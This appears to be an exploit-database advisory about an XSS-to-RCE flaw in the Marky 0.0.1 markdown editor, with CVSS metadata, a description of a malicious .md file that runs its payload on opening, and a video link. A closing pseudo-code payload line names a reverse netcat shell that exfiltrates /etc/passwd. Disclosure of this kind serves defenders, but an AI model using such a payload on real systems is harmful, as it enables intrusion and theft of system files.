Marky_0.0.1_XSS&RCE漏洞

# Marky 0.0.1 XSS&RCE漏洞
==EXP==

# Exploit Title: Marky 0.0.1 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/vesparny/marky
# Version: 0.0.1
# Tested on: Linux, MacOs, Windows

# Software Description:
Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page.



# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.


#Proof Video
https://imgur.com/a/qclfrUx



# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)

[